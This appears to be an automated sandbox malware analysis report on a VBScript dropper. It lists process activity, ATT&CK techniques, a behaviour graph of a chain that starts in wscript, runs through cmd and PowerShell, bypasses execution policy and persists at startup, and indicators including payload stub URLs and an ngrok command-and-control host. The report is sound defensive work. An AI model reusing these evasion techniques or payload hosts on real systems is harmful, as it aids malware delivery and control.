Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information222
Scripting		Valid Accounts11
Windows Management Instrumentation		222
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping121
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		2
Registry Run Keys / Startup Folder		2
Registry Run Keys / Startup Folder		131
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		11
Process Injection		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
PowerShell		Login HookLogin Hook2
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture1
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials13
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573765 Sample: 7299_output.vbs Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 80 emptyservices.xyz 2->80 82 0.tcp.eu.ngrok.io 2->82 88 Sigma detected: Drops script at startup location 2->88 90 Connects to many ports of the same IP (likely port scanning) 2->90 92 Sigma detected: WScript or CScript Dropper 2->92 96 2 other signatures 2->96 13 wscript.exe 2 2->13         started        17 cmd.exe 1 2->17         started        signatures3 94 Performs DNS queries to domains with low reputation 80->94 process4 file5 76 C:\Users\user\AppData\Local\Temp\c.bat, DOS 13->76 dropped 112 VBScript performs obfuscated calls to suspicious functions 13->112 114 Wscript starts Powershell (via cmd or directly) 13->114 116 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->116 118 Suspicious execution chain found 13->118 19 cmd.exe 1 13->19         started        21 cmd.exe 1 13->21         started        24 cmd.exe 1 17->24         started        26 conhost.exe 17->26         started        signatures6 process7 signatures8 28 cmd.exe 1 19->28         started        31 conhost.exe 19->31         started        100 Wscript starts Powershell (via cmd or directly) 21->100 102 Bypasses PowerShell execution policy 21->102 33 powershell.exe 14 15 21->33         started        35 conhost.exe 21->35         started        37 powershell.exe 27 24->37         started        39 conhost.exe 24->39         started        41 cmd.exe 24->41         started        43 timeout.exe 24->43         started        process9 signatures10 104 Wscript starts Powershell (via cmd or directly) 28->104 45 powershell.exe 29 28->45         started        49 conhost.exe 28->49         started        51 timeout.exe 1 28->51         started        53 cmd.exe 1 28->53         started        106 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 33->106 108 Suspicious powershell command line found 33->108 55 powershell.exe 37->55         started        process11 file12 78 C:\Users\user\AppData\...78etwork97287Man.cmd, DOS 45->78 dropped 120 Suspicious powershell command line found 45->120 57 cmd.exe 1 45->57         started        59 powershell.exe 28 45->59         started        signatures13 process14 process15 61 cmd.exe 1 57->61         started        64 conhost.exe 57->64         started        signatures16 110 Wscript starts Powershell (via cmd or directly) 61->110 66 powershell.exe 28 61->66         started        70 conhost.exe 61->70         started        72 cmd.exe 1 61->72         started        process17 dnsIp18 84 0.tcp.eu.ngrok.io 3.78.28.71, 13094, 49846, 49864 AMAZON-02US United States 66->84 86 127.0.0.1 unknown unknown 66->86 98 Suspicious powershell command line found 66->98 74 powershell.exe 66->74         started        signatures19 process20

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
7299_output.vbs0%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://emptyservices.xyz/stub0%Avira URL Cloudsafe
https://emptyservices.xyz/stub.txt0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
0.tcp.eu.ngrok.io
3.78.28.71
truetrue
    		unknown
    emptyservices.xyz
    		unknown
    		unknownfalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1759342843.000001D0901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1742529866.000001D08194B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1759342843.000001D090076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C49A03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C480CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A657B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3981F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A66B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3967CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD9384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE9183000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://emptyservices.xyz/stubpowershell.exe, 00000003.00000002.1742529866.000001D081778000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://go.micropowershell.exe, 00000003.00000002.1742529866.000001D080C2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C48D2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397940000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD9EFD000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1759342843.000001D0901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1742529866.000001D08194B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1759342843.000001D090076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C49A03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C480CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A657B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3981F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A66B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3967CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD92A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE9183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Iconpowershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://oneget.orgXpowershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://aka.ms/pscore68powershell.exe, 00000003.00000002.1742529866.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C47DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3964F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD8FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1742529866.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C47DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3964F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD8FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://emptyservices.xyz/stub.txtpowershell.exe, 00000003.00000002.1764714970.000001D0F58A4000.00000004.00000020.00020000.00000000.sdmp, 7299_output.vbstrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://emptyservices.xyzpowershell.exe, 00000003.00000002.1742529866.000001D081341000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://oneget.orgpowershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    3.78.28.71
                                    		0.tcp.eu.ngrok.ioUnited States
                                    		16509AMAZON-02UStrue

                                    Private

                                    IP
                                    127.0.0.1

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1573765
                                    Start date and time:2024-12-12 15:39:18 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 8s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:31
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:7299_output.vbs
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winVBS@46/24@2/2
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 53%
                                    • Number of executed functions: 9
